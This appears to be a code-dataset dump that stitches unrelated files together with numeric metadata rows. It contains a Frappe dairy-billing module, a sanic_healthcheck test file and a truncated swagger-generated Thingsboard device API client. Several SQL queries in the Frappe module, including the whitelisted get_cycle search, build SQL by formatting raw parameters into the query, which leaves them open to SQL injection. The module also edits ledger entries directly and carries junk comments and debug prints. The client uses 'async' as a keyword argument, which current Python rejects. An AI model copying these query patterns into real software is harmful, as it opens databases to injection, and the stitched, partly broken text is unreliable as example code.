gl_debit = frappe.db.get_value("GL Entry", {"account": 'Creditors - '+vlcc_attr, "voucher_no": je_no},"name")
gl_credit = frappe.db.get_value("GL Entry", {"account": "Loans and Advances Payable - "+vlcc_attr, \
"voucher_no": je_no},"name")
print gl_debit,"vlcc******",gl_credit,je_no
#For Debitors
frappe.db.set_value("GL Entry",gl_debit,"debit", 0)
frappe.db.set_value("GL Entry",gl_debit,"credit", amount)
frappe.db.set_value("GL Entry",gl_debit,"credit_in_account_currency", amount)
frappe.db.set_value("GL Entry",gl_debit,"debit_in_account_currency", 0)
frappe.db.set_value("GL Entry",gl_debit,"posting_date", self.collection_to)
#For Creditor
frappe.db.set_value("GL Entry",gl_credit,"debit", amount)
frappe.db.set_value("GL Entry",gl_credit,"credit", 0)
frappe.db.set_value("GL Entry",gl_credit,"credit_in_account_currency", 0)
frappe.db.set_value("GL Entry",gl_credit,"debit_in_account_currency", amount)
#For receive pay and net payoff reports
frappe.db.set_value("GL Entry",gl_credit,"posting_date", self.collection_to)
def update_gl_entry_vlcc_loan(self, je_no, principal_interest):
if je_no and principal_interest:
vlcc_attr = frappe.db.get_value("Company", self.vlcc_name, ['abbr','name'],as_dict=1)
gl_debit_principal = frappe.db.get_value("GL Entry", {"account": "Loans and Advances Payable - "+vlcc_attr.get('abbr'), "voucher_no": je_no},"name")
gl_credit = frappe.db.get_value("GL Entry", {"account": "Creditors - "+vlcc_attr.get('abbr'), "voucher_no": je_no},"name")
gl_debit_interest = frappe.db.get_value("GL Entry", {"account":"Interest Expense - "+vlcc_attr.get('abbr'), "voucher_no": je_no},"name")
total_amount = flt(principal_interest.get('principal')+principal_interest.get('interest'),2)
print gl_debit_principal,gl_credit,gl_debit_interest,total_amount,principal_interest.get('principal'),principal_interest.get('interest')
# sdfsdfdsfksfksdjfskdfjsdkf
frappe.db.set_value("GL Entry", gl_debit_principal,"debit", flt(principal_interest.get('principal'),2))
frappe.db.set_value("GL Entry", gl_debit_principal,"credit", 0)
frappe.db.set_value("GL Entry", gl_debit_principal,"credit_in_account_currency", 0)
frappe.db.set_value("GL Entry", gl_debit_principal,"debit_in_account_currency", flt(principal_interest.get('principal'),2))
frappe.db.set_value("GL Entry", gl_debit_principal,"posting_date", self.collection_to)
frappe.db.set_value("GL Entry", gl_credit,"debit", 0)
frappe.db.set_value("GL Entry", gl_credit,"credit", total_amount)
frappe.db.set_value("GL Entry", gl_credit,"credit_in_account_currency", total_amount)
frappe.db.set_value("GL Entry", gl_credit,"debit_in_account_currency", 0)
frappe.db.set_value("GL Entry", gl_credit,"posting_date", self.collection_to)
frappe.db.set_value("GL Entry",gl_debit_interest,"debit", 0)
frappe.db.set_value("GL Entry", gl_debit_interest,"credit", flt(principal_interest.get('interest'),2))
frappe.db.set_value("GL Entry", gl_debit_interest,"credit_in_account_currency", flt(principal_interest.get('interest'),2))
frappe.db.set_value("GL Entry", gl_debit_interest,"debit_in_account_currency", 0)
frappe.db.set_value("GL Entry", gl_debit_interest,"posting_date", self.collection_to)
def update_advance_after_vpcr(self, row):
instalment = 0
je_amt = frappe.get_all("Journal Entry",fields=['ifnull(sum(total_debit), 0) as amt']\
,filters={'vlcc_advance':row.adv_id, 'type': 'Vlcc Advance', 'company': self.vlcc_name})
adv_doc = frappe.get_doc("Vlcc Advance", row.adv_id)
adv_doc.outstanding_amount = float(adv_doc.advance_amount) - je_amt[0].get('amt')
for i in adv_doc.cycle:
instalment +=1
adv_doc.paid_instalment = instalment
if adv_doc.outstanding_amount > 0 :
adv_doc.emi_amount = (float(adv_doc.outstanding_amount)) / (float(adv_doc.no_of_instalment) + float(adv_doc.extension) - float(adv_doc.paid_instalment))
if adv_doc.outstanding_amount == 0:
adv_doc.status = "Paid"
adv_doc.emi_amount = 0
adv_doc.flags.ignore_permissions =True
adv_doc.save()
def update_loan_vpcr_je(self, row):
instalment = 0
je_amt = frappe.get_all("Journal Entry",fields=['ifnull(sum(total_debit), 0) as amt']\
,filters={'vlcc_advance':row.loan_id, 'type': 'Vlcc Loan', 'company': self.vlcc_name})
loan_doc = frappe.get_doc("Vlcc Loan", row.loan_id)
loan_doc.outstanding_amount = float(loan_doc.advance_amount) - je_amt[0].get('amt')
for i in loan_doc.cycle:
instalment += 1
loan_doc.paid_instalment = instalment
if loan_doc.outstanding_amount > 0:
loan_doc.emi_amount = (float(loan_doc.outstanding_amount)) / (float(loan_doc.no_of_instalments) + float(loan_doc.extension) - float(loan_doc.paid_instalment))
if loan_doc.outstanding_amount == 0:
loan_doc.status = "Paid"
loan_doc.emi_amount = 0
loan_doc.flags.ignore_permissions = True
loan_doc.save()
def update_advance_doc(self, row, je=None):
instalment = 0
je_amt = frappe.get_all("Journal Entry",fields=['ifnull(sum(total_debit), 0) as amt']\
,filters={'vlcc_advance':row.adv_id, 'type': 'Vlcc Advance', 'company': self.vlcc_name})
adv_doc = frappe.get_doc("Vlcc Advance", row.adv_id)
adv_doc.append("cycle", {"cycle": self.cycle, "sales_invoice": je})
adv_doc.outstanding_amount = float(adv_doc.advance_amount) - je_amt[0].get('amt')
for i in adv_doc.cycle:
instalment +=1
adv_doc.paid_instalment = instalment
if adv_doc.outstanding_amount > 0 :
print (float(adv_doc.no_of_instalment),"no_of_instalment",float(adv_doc.extension),"extension", float(adv_doc.paid_instalment)),"paid_instalment********************"
adv_doc.emi_amount = (float(adv_doc.outstanding_amount)) / (float(adv_doc.no_of_instalment) + float(adv_doc.extension) - float(adv_doc.paid_instalment))
if adv_doc.outstanding_amount == 0:
adv_doc.status = "Paid"
adv_doc.emi_amount = 0
adv_doc.flags.ignore_permissions =True
adv_doc.save()
def update_loan_je(self, row, je = None):
instalment = 0
je_amt = frappe.get_all("Journal Entry",fields=['ifnull(sum(total_debit), 0) as amt']\
,filters={'vlcc_advance':row.loan_id, 'type': 'Vlcc Loan', 'company': self.vlcc_name})
loan_doc = frappe.get_doc("Vlcc Loan", row.loan_id)
loan_doc.append("cycle", {"cycle": self.cycle, "sales_invoice": je})
loan_doc.outstanding_amount = float(loan_doc.advance_amount) - je_amt[0].get('amt')
for i in loan_doc.cycle:
instalment += 1
loan_doc.paid_instalment = instalment
if loan_doc.outstanding_amount > 0:
loan_doc.emi_amount = (float(loan_doc.outstanding_amount)) / (float(loan_doc.no_of_instalments) + float(loan_doc.extension) - float(loan_doc.paid_instalment))
if loan_doc.outstanding_amount == 0:
loan_doc.status = "Paid"
loan_doc.emi_amount = 0
loan_doc.flags.ignore_permissions = True
loan_doc.save()
def create_incentive(self):
company = frappe.db.get_value("Company",{'is_dairy':1},'name')
pi = frappe.new_doc("Purchase Invoice")
pi.supplier = self.vlcc_name
pi.company = company
pi.pi_type = "Incentive"
pi.cycle = self.cycle
pi.append("items",
{
"qty":1,
"item_code": "Milk Incentives",
"rate": self.incentives,
"amount": self.incentives,
"cost_center": frappe.db.get_value("Company", self.vlcc_name, "cost_center")
})
pi.flags.ignore_permissions = True
pi.save()
pi.submit()
#updating date for current cycle
frappe.db.set_value("Purchase Invoice", pi.name, 'posting_date', self.collection_to)
gl_stock = frappe.db.get_value("Company", company, 'stock_received_but_not_billed')
gl_credit = frappe.db.get_value("Company", company, 'default_payable_account')
frappe.db.set_value("GL Entry",{'account': gl_stock,'voucher_no':pi.name}, 'posting_date', self.collection_to)
frappe.db.set_value("GL Entry",{'account': gl_credit,'voucher_no':pi.name}, 'posting_date', self.collection_to)
def get_interest_amount(amount, data):
loan_doc = frappe.get_all("Vlcc Loan",fields=['interest','no_of_instalments','emi_amount'],filters={'name':data})
interest_per_cycle = loan_doc[0].get('interest') / loan_doc[0].get('no_of_instalments')
if amount <= interest_per_cycle:
interest_per_cycle = flt(amount,2)
principal_per_cycle = 0
else:
interest_per_cycle = flt(interest_per_cycle,2)
principal_per_cycle = flt((amount - interest_per_cycle),2)
return { 'interest': interest_per_cycle , 'principal': principal_per_cycle}
@frappe.whitelist()
def get_vmcr(start_date, end_date, vlcc, cycle=None):
vmcr = frappe.db.sql("""
select rcvdtime,shift,milkquantity,fat,snf,rate,amount
from
`tabVlcc Milk Collection Record`
where
associated_vlcc = '{0}' and date(rcvdtime) between '{1}' and '{2}'
""".format(vlcc, start_date, end_date),as_dict=1,debug=0)
amount = 0
qty = 0
for i in vmcr:
amount += i.get('amount')
qty += i.get('milkquantity')
amount = flt(amount,2)
return {
"vmcr":vmcr,
"incentive": get_incentives(amount, qty, vlcc) or 0,
"vlcc_child_loan": get_vlcc_loans_child(start_date, end_date, vlcc, cycle),
"vlcc_child_advance": get_vlcc_advance_child(start_date, end_date, vlcc, cycle),
"feed_and_fodder": get_mi_raised(start_date, end_date, vlcc)
}
def get_incentives(amount, qty, vlcc=None):
if vlcc and amount and qty:
incentive = 0
dairy_setting = frappe.get_doc("Dairy Setting")
if dairy_setting.enable_per_litre and dairy_setting.per_litre:
incentive = (float(dairy_setting.per_litre) * float(qty))
elif not dairy_setting.enable_per_litre and dairy_setting.vlcc_incentives:
incentive = (float(dairy_setting.vlcc_incentives) * float(amount)) / 100
return incentive
def get_vlcc_loans_child(start_date, end_date, vlcc, cycle=None):
loans_ = frappe.db.sql("""
select name,outstanding_amount,
emi_amount,no_of_instalments,paid_instalment,advance_amount,
emi_deduction_start_cycle,extension,date_of_disbursement,vlcc_id
from
`tabVlcc Loan`
where
outstanding_amount != 0
and vlcc_id = '{0}'
and date_of_disbursement < now() and docstatus =1
""".format(vlcc),as_dict=1,debug=0)
loans = []
for row in loans_:
req_cycle = req_cycle_computation(row)
if cycle in req_cycle_computation(row):
loans.append(row)
return loans
def get_vlcc_advance_child(start_date, end_date, vlcc, cycle=None):
advance_ = frappe.db.sql("""
select name,outstanding_amount,emi_amount,advance_amount,
no_of_instalment,paid_instalment,emi_deduction_start_cycle,
extension,date_of_disbursement,vlcc
from
`tabVlcc Advance`
where
outstanding_amount != 0
and vlcc = '{0}'
and date_of_disbursement < now() and docstatus =1
""".format(vlcc),as_dict=1,debug=0)
advance = []
for row in advance_:
if cycle in req_cycle_computation_advance(row):
advance.append(row)
return advance
def req_cycle_computation(data):
if data.get('emi_deduction_start_cycle') > 0:
not_req_cycl = frappe.db.sql("""
select name
from
`tabCyclewise Date Computation`
where
'{0}' < start_date
or date('{0}') between start_date and end_date
order by start_date limit {2}""".
format(data.get('date_of_disbursement'),data.get('vlcc_id'),data.get('emi_deduction_start_cycle')),as_dict=1,debug=0)
not_req_cycl_list = [ '"%s"'%i.get('name') for i in not_req_cycl ]
instalment = int(data.get('no_of_instalments')) + int(data.get('extension'))
req_cycle = frappe.db.sql("""
select name
from
`tabCyclewise Date Computation`
where
'{date}' <= end_date and name not in ({cycle}) order by start_date limit {instalment}
""".format(date=data.get('date_of_disbursement'), cycle = ','.join(not_req_cycl_list),vlcc = data.get('vlcc_id'),
instalment = instalment),as_dict=1,debug=1)
req_cycl_list = [i.get('name') for i in req_cycle]
return req_cycl_list
elif data.get('emi_deduction_start_cycle') == 0:
instalment = int(data.get('no_of_instalments')) + int(data.get('extension'))
req_cycle = frappe.db.sql("""
select
name
from
`tabCyclewise Date Computation`
where
'{date}' <= end_date
order by start_date limit {instalment}
""".format(date=data.get('date_of_disbursement'),instalment = instalment),as_dict=1,debug=0)
req_cycl_list = [i.get('name') for i in req_cycle]
return req_cycl_list
return []
def req_cycle_computation_advance(data):
if data.get('emi_deduction_start_cycle') > 0:
not_req_cycl = frappe.db.sql("""
select name
from
`tabCyclewise Date Computation`
where
'{0}' < start_date
or date('{0}') between start_date and end_date
order by start_date limit {1}""".
format(data.get('date_of_disbursement'),data.get('emi_deduction_start_cycle')),as_dict=1,debug=0)
not_req_cycl_list = [ '"%s"'%i.get('name') for i in not_req_cycl ]
instalment = int(data.get('no_of_instalment')) + int(data.get('extension'))
if len(not_req_cycl):
req_cycle = frappe.db.sql("""
select name
from
`tabCyclewise Date Computation`
where
'{date}' <= end_date and name not in ({cycle}) order by start_date limit {instalment}
""".format(date=data.get('date_of_disbursement'), cycle = ','.join(not_req_cycl_list),
instalment = instalment),as_dict=1)
req_cycl_list = [i.get('name') for i in req_cycle]
return req_cycl_list
elif data.get('emi_deduction_start_cycle') == 0:
instalment = int(data.get('no_of_instalment')) + int(data.get('extension'))
req_cycle = frappe.db.sql("""
select
name
from
`tabCyclewise Date Computation`
where
'{date}' <= end_date
order by start_date limit {instalment}
""".format(date=data.get('date_of_disbursement'),instalment = instalment),as_dict=1,debug=0)
req_cycl_list = [i.get('name') for i in req_cycle]
return req_cycl_list
return []
def get_mi_raised(start_date, end_date, vlcc):
grand_total = 0
sales_invoice = frappe.db.sql("""
select
sum(grand_total)
from
`tabSales Invoice` si
where
si.customer = '{0}'
and si.posting_date between '{1}' and '{2}'
and si.type not in ('Vlcc Advance','Vlcc Loan')
""".format(vlcc,start_date,end_date),as_list=1,debug=0)
if sales_invoice:
grand_total = sales_invoice[0][0]
return grand_total
@frappe.whitelist()
def get_updated_loan(cycle, data, loan_id=None, amount=None, total = None, vlcc = None):
data, total_paid, total_amount, overriding_amount = json.loads(data), 0, 0, 0
for row in data.get('vlcc_loan_child'):
total_amount += row.get('principle')
overriding_amount += row.get('amount')
return flt((total_amount - overriding_amount),2) or 0
@frappe.whitelist()
def get_updated_advance(cycle, data, adv_id=None, amount=None, total = None,vlcc = None):
data, total_paid, total_amount, overriding_amount = json.loads(data), 0, 0, 0
for row in data.get('vlcc_advance_child'):
total_amount += row.get('principle')
overriding_amount += row.get('amount')
return flt((total_amount - overriding_amount),2) or 0
@frappe.whitelist()
def get_vpcr_flag():
return frappe.get_doc("Dairy Setting").as_dict().get('is_vpcr')
@frappe.whitelist()
def get_cycle(doctype,text,searchfields,start,pagelen,filters):
return frappe.db.sql("""
select name
from
`tabCyclewise Date Computation`
where
end_date < now() and name like '{txt}'
""".format(txt= "%%%s%%" % text,as_list=True))
| 47.57638
| 180
| 0.724165
| 5,563
| 37,062
| 4.542873
| 0.048355
| 0.0478
| 0.035692
| 0.051915
| 0.84742
| 0.830366
| 0.813469
| 0.788659
| 0.757558
| 0.733737
| 0
| 0.005792
| 0.124143
| 37,062
| 779
| 181
| 47.57638
| 0.772743
| 0.011953
| 0
| 0.573295
| 0
| 0
| 0.284949
| 0.050843
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.011611
| null | null | 0.011611
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
00a711daf1dd9eabeedd551a568acd0430c7d948
| 1,653
|
py
|
Python
|
tests/test_handlers.py
|
edaniszewski/sanic-healthcheck
|
25acc8c7fe71a9802ad83f95c5ed01354fc868fb
|
[
"MIT"
] | 3
|
2020-07-17T05:19:17.000Z
|
2022-02-20T04:16:48.000Z
|
tests/test_handlers.py
|
edaniszewski/sanic-healthcheck
|
25acc8c7fe71a9802ad83f95c5ed01354fc868fb
|
[
"MIT"
] | null | null | null |
tests/test_handlers.py
|
edaniszewski/sanic-healthcheck
|
25acc8c7fe71a9802ad83f95c5ed01354fc868fb
|
[
"MIT"
] | null | null | null |
import json
import math
import time
from sanic_healthcheck import handlers
def test_json_success_handler():
results = [
{'test': 'foo'},
{'test': 'bar'},
]
now = time.time()
actual = handlers.json_success_handler(results)
assert isinstance(actual, str)
loaded = json.loads(actual)
assert isinstance(loaded, dict)
assert loaded['status'] == 'success'
assert math.isclose(loaded['timestamp'], now, rel_tol=1)
assert loaded['results'] == results
def test_json_success_handler_no_results():
now = time.time()
actual = handlers.json_success_handler([])
assert isinstance(actual, str)
loaded = json.loads(actual)
assert isinstance(loaded, dict)
assert loaded['status'] == 'success'
assert math.isclose(loaded['timestamp'], now, rel_tol=1)
assert loaded['results'] == []
def test_json_failure_handler():
results = [
{'test': 'foo'},
{'test': 'bar'},
]
now = time.time()
actual = handlers.json_failure_handler(results)
assert isinstance(actual, str)
loaded = json.loads(actual)
assert isinstance(loaded, dict)
assert loaded['status'] == 'failure'
assert math.isclose(loaded['timestamp'], now, rel_tol=1)
assert loaded['results'] == results
def test_json_failure_handler_no_results():
now = time.time()
actual = handlers.json_failure_handler([])
assert isinstance(actual, str)
loaded = json.loads(actual)
assert isinstance(loaded, dict)
assert loaded['status'] == 'failure'
assert math.isclose(loaded['timestamp'], now, rel_tol=1)
assert loaded['results'] == []
| 22.643836
| 60
| 0.656382
| 193
| 1,653
| 5.471503
| 0.160622
| 0.121212
| 0.041667
| 0.064394
| 0.939394
| 0.91572
| 0.892045
| 0.892045
| 0.86553
| 0.780303
| 0
| 0.003051
| 0.206897
| 1,653
| 72
| 61
| 22.958333
| 0.802441
| 0
| 0
| 0.708333
| 0
| 0
| 0.087167
| 0
| 0
| 0
| 0
| 0
| 0.416667
| 1
| 0.083333
| false
| 0
| 0.083333
| 0
| 0.166667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
971abf0ab7f8dfbbdebb0348c938e0cb37b948f7
| 53,849
|
py
|
Python
|
tb_api_client/swagger_client/apis/device_controller_api.py
|
MOSAIC-LoPoW/oss7-thingsboard-backend-example
|
9b289dd7fdbb6e932ca338ad497a7bb1fc84d010
|
[
"Apache-2.0"
] | 5
|
2017-11-27T15:48:16.000Z
|
2020-09-21T04:18:47.000Z
|
tb_api_client/swagger_client/apis/device_controller_api.py
|
MOSAIC-LoPoW/oss7-thingsboard-backend-example
|
9b289dd7fdbb6e932ca338ad497a7bb1fc84d010
|
[
"Apache-2.0"
] | null | null | null |
tb_api_client/swagger_client/apis/device_controller_api.py
|
MOSAIC-LoPoW/oss7-thingsboard-backend-example
|
9b289dd7fdbb6e932ca338ad497a7bb1fc84d010
|
[
"Apache-2.0"
] | 6
|
2018-01-14T17:23:46.000Z
|
2019-06-24T13:38:54.000Z
|
# coding: utf-8
"""
Thingsboard REST API
For instructions how to authorize requests please visit <a href='http://thingsboard.io/docs/reference/rest-api/'>REST API documentation page</a>.
OpenAPI spec version: 2.0
Contact: info@thingsboard.io
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import sys
import os
import re
# python 2 and python 3 compatibility library
from six import iteritems
from ..api_client import ApiClient
class DeviceControllerApi(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def assign_device_to_customer_using_post(self, customer_id, device_id, **kwargs):
"""
assignDeviceToCustomer
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.assign_device_to_customer_using_post(customer_id, device_id, async=True)
>>> result = thread.get()
:param async bool
:param str customer_id: customerId (required)
:param str device_id: deviceId (required)
:return: Device
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.assign_device_to_customer_using_post_with_http_info(customer_id, device_id, **kwargs)
else:
(data) = self.assign_device_to_customer_using_post_with_http_info(customer_id, device_id, **kwargs)
return data
def assign_device_to_customer_using_post_with_http_info(self, customer_id, device_id, **kwargs):
"""
assignDeviceToCustomer
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.assign_device_to_customer_using_post_with_http_info(customer_id, device_id, async=True)
>>> result = thread.get()
:param async bool
:param str customer_id: customerId (required)
:param str device_id: deviceId (required)
:return: Device
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['customer_id', 'device_id']
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method assign_device_to_customer_using_post" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'customer_id' is set
if ('customer_id' not in params) or (params['customer_id'] is None):
raise ValueError("Missing the required parameter `customer_id` when calling `assign_device_to_customer_using_post`")
# verify the required parameter 'device_id' is set
if ('device_id' not in params) or (params['device_id'] is None):
raise ValueError("Missing the required parameter `device_id` when calling `assign_device_to_customer_using_post`")
collection_formats = {}
path_params = {}
if 'customer_id' in params:
path_params['customerId'] = params['customer_id']
if 'device_id' in params:
path_params['deviceId'] = params['device_id']
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['*/*'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['X-Authorization']
return self.api_client.call_api('/api/customer/{customerId}/device/{deviceId}', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Device',
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def assign_device_to_public_customer_using_post(self, device_id, **kwargs):
"""
assignDeviceToPublicCustomer
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.assign_device_to_public_customer_using_post(device_id, async=True)
>>> result = thread.get()
:param async bool
:param str device_id: deviceId (required)
:return: Device
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.assign_device_to_public_customer_using_post_with_http_info(device_id, **kwargs)
else:
(data) = self.assign_device_to_public_customer_using_post_with_http_info(device_id, **kwargs)
return data
def assign_device_to_public_customer_using_post_with_http_info(self, device_id, **kwargs):
"""
assignDeviceToPublicCustomer
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.assign_device_to_public_customer_using_post_with_http_info(device_id, async=True)
>>> result = thread.get()
:param async bool
:param str device_id: deviceId (required)
:return: Device
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['device_id']
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method assign_device_to_public_customer_using_post" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'device_id' is set
if ('device_id' not in params) or (params['device_id'] is None):
raise ValueError("Missing the required parameter `device_id` when calling `assign_device_to_public_customer_using_post`")
collection_formats = {}
path_params = {}
if 'device_id' in params:
path_params['deviceId'] = params['device_id']
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['*/*'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['X-Authorization']
return self.api_client.call_api('/api/customer/public/device/{deviceId}', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Device',
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_device_using_delete(self, device_id, **kwargs):
"""
deleteDevice
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.delete_device_using_delete(device_id, async=True)
>>> result = thread.get()
:param async bool
:param str device_id: deviceId (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.delete_device_using_delete_with_http_info(device_id, **kwargs)
else:
(data) = self.delete_device_using_delete_with_http_info(device_id, **kwargs)
return data
def delete_device_using_delete_with_http_info(self, device_id, **kwargs):
"""
deleteDevice
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.delete_device_using_delete_with_http_info(device_id, async=True)
>>> result = thread.get()
:param async bool
:param str device_id: deviceId (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['device_id']
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_device_using_delete" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'device_id' is set
if ('device_id' not in params) or (params['device_id'] is None):
raise ValueError("Missing the required parameter `device_id` when calling `delete_device_using_delete`")
collection_formats = {}
path_params = {}
if 'device_id' in params:
path_params['deviceId'] = params['device_id']
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['*/*'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['X-Authorization']
return self.api_client.call_api('/api/device/{deviceId}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def find_by_query_using_post1(self, query, **kwargs):
"""
findByQuery
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.find_by_query_using_post1(query, async=True)
>>> result = thread.get()
:param async bool
:param DeviceSearchQuery query: query (required)
:return: list[Device]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.find_by_query_using_post1_with_http_info(query, **kwargs)
else:
(data) = self.find_by_query_using_post1_with_http_info(query, **kwargs)
return data
def find_by_query_using_post1_with_http_info(self, query, **kwargs):
"""
findByQuery
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.find_by_query_using_post1_with_http_info(query, async=True)
>>> result = thread.get()
:param async bool
:param DeviceSearchQuery query: query (required)
:return: list[Device]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['query']
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method find_by_query_using_post1" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'query' is set
if ('query' not in params) or (params['query'] is None):
raise ValueError("Missing the required parameter `query` when calling `find_by_query_using_post1`")
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'query' in params:
body_params = params['query']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['*/*'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['X-Authorization']
return self.api_client.call_api('/api/devices', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[Device]',
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_customer_devices_using_get(self, customer_id, limit, **kwargs):
"""
getCustomerDevices
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_customer_devices_using_get(customer_id, limit, async=True)
>>> result = thread.get()
:param async bool
:param str customer_id: customerId (required)
:param str limit: limit (required)
:param str type: type
:param str text_search: textSearch
:param str id_offset: idOffset
:param str text_offset: textOffset
:return: TextPageDataDevice
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_customer_devices_using_get_with_http_info(customer_id, limit, **kwargs)
else:
(data) = self.get_customer_devices_using_get_with_http_info(customer_id, limit, **kwargs)
return data
def get_customer_devices_using_get_with_http_info(self, customer_id, limit, **kwargs):
"""
getCustomerDevices
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_customer_devices_using_get_with_http_info(customer_id, limit, async=True)
>>> result = thread.get()
:param async bool
:param str customer_id: customerId (required)
:param str limit: limit (required)
:param str type: type
:param str text_search: textSearch
:param str id_offset: idOffset
:param str text_offset: textOffset
:return: TextPageDataDevice
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['customer_id', 'limit', 'type', 'text_search', 'id_offset', 'text_offset']
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_customer_devices_using_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'customer_id' is set
if ('customer_id' not in params) or (params['customer_id'] is None):
raise ValueError("Missing the required parameter `customer_id` when calling `get_customer_devices_using_get`")
# verify the required parameter 'limit' is set
if ('limit' not in params) or (params['limit'] is None):
raise ValueError("Missing the required parameter `limit` when calling `get_customer_devices_using_get`")
collection_formats = {}
path_params = {}
if 'customer_id' in params:
path_params['customerId'] = params['customer_id']
query_params = []
if 'type' in params:
query_params.append(('type', params['type']))
if 'text_search' in params:
